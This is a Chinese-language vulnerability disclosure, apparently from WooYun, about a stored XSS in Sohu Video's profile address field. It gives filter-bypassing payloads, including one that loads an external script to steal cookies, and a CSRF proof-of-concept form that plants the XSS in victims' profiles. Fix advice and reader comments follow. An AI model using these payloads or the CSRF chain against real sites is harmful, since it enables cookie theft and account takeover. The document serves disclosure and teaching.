搜狐视频储存型XSS（过滤了尖括号/圆括号/单引号等字符下的利用技巧）

漏洞缺陷位置：基本资料 - 个人资料 - 通讯地址： http://my.tv.sohu.com/user/setting/basic.do

然后测试后发现，这里过滤了常见的script关键字，还有尖括号 >< ，单引号 ' ，圆括号 ) (

测试了一番后，绕过了这些过滤，成功弹窗。

payload：

xxxxxxxxxx" name=javasCript:alert%281%29 autofocus onfocus=location=this.name xx

代码执行流程如下图箭头所示：

然后尝试写入外部js文件，测试后发现有200字节的长度限制，注意一下过滤的那些东西，我直接给出payload吧。

xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx

如下图，成功写入代码，生成调用外部js文件的js代码，获取cookie~

这里做下简单的说明，为什么payload要这么写呢？

1 由于过滤了尖括号><，所以只能在input标签内部构造，input标签最好用的xss事件就是onfocus了

2 由于过滤了圆括号()，所以用 location=url编码 的这种模式可以将括号写为%28 %29

3 由于过滤了单引号'，所以location='alert%271%28'这样就不能用了，所以利用this.name进行传值

4 script关键字有过滤，所以用sCript大小写混淆绕过

基本就这样了吧，综上就可以得出上面的payload了~

下面再说下CSRF漏洞，因为这里的单一XSS漏洞没有什么意义，只是个selfxss自己x自己的。

然后这里的post保存请求没有验证referer，所以可以CSRF，2者结合起来就可以X别人了。

中招CSRF就直接埋下了持久的XSS后门。

这里直接给出可以埋下，调用任意外部js文件，的CSRF的poc代码：

<form id="csrfdemo" action="http://my.tv.sohu.com/user/profile/basic_update.do" method="POST">
 <input type='hidden' name='nickname' value='test12341478524'><input type='hidden' name='sex' value='0'><input type='hidden' name='usermail' value=''><input type='hidden' name='year' value='0000'><input type='hidden' name='month' value='00'><input type='hidden' name='day' value='00'><input type='hidden' name='city1' value='0'><input type='hidden' name='usersign' value=''><input type='hidden' name='address' value='xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx'><input type='hidden' name='postcode' value=''>
 </form>
 <button onclick="document.getElementById('csrfdemo').submit()">测试</button>

XSS 把剩下唯一没过滤的双引号，再过滤下就行了

CSRF 验证referer信息

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-04-12 10:10

厂商回复：

感谢支持！

最新状态：

暂无

1. 2016-04-12 10:17 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

   1

   小厂商 2分，醉了~~

   1# 回复此人

2. 2016-04-13 13:27 | discovery ( 路人 | Rank:9 漏洞数:3 | www.google.com)

   1

   @px1624 搜狐咋也小厂商了

   2# 回复此人

3. 2016-05-27 10:21 | 酷帥王子 ( 普通白帽子 | Rank:270 漏洞数:74 | 天之屌，人之神！天人合一，乃屌神也！绝对...)

   1

   没想到过滤<>竟然搞得有声有色，666不错

   3# 回复此人

4. 2016-05-27 10:25 | 重瞳 ( 路人 | Rank:11 漏洞数:2 | 我是重瞳)

   1

   @酷帥王子 哈哈哈

   4# 回复此人

5. 2016-05-27 11:40 | dragon110 ( 路人 | Rank:12 漏洞数:6 | 其实我是龙6)

   0

   洞主，那个收Cookie的是什么工具呀。

   5# 回复此人

6. 2016-05-27 11:50 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

   0

   @酷帥王子 过滤尖括号是最常见的……

   6# 回复此人

7. 2016-05-27 11:51 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

   0

   @dragon110 最一般的xsser.me

   7# 回复此人

8. 2016-05-27 11:56 | dragon110 ( 路人 | Rank:12 漏洞数:6 | 其实我是龙6)

   0

   @px1624 谢谢大神解答。

   8# 回复此人

9. 2016-05-28 16:10 | 酷帥王子 ( 普通白帽子 | Rank:270 漏洞数:74 | 天之屌，人之神！天人合一，乃屌神也！绝对...)

   0

   PX牛，这个漏洞算是给大家科普了，以前一直以为过滤<>都无法玩了，就放弃了今天第二次看，百看不厌

   9# 回复此人

10. 2016-05-29 23:02 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

    0

    @酷帥王子 http://wooyun.org/bugs/wooyun-2010-0167250 这个过滤的更严格~

    10# 回复此人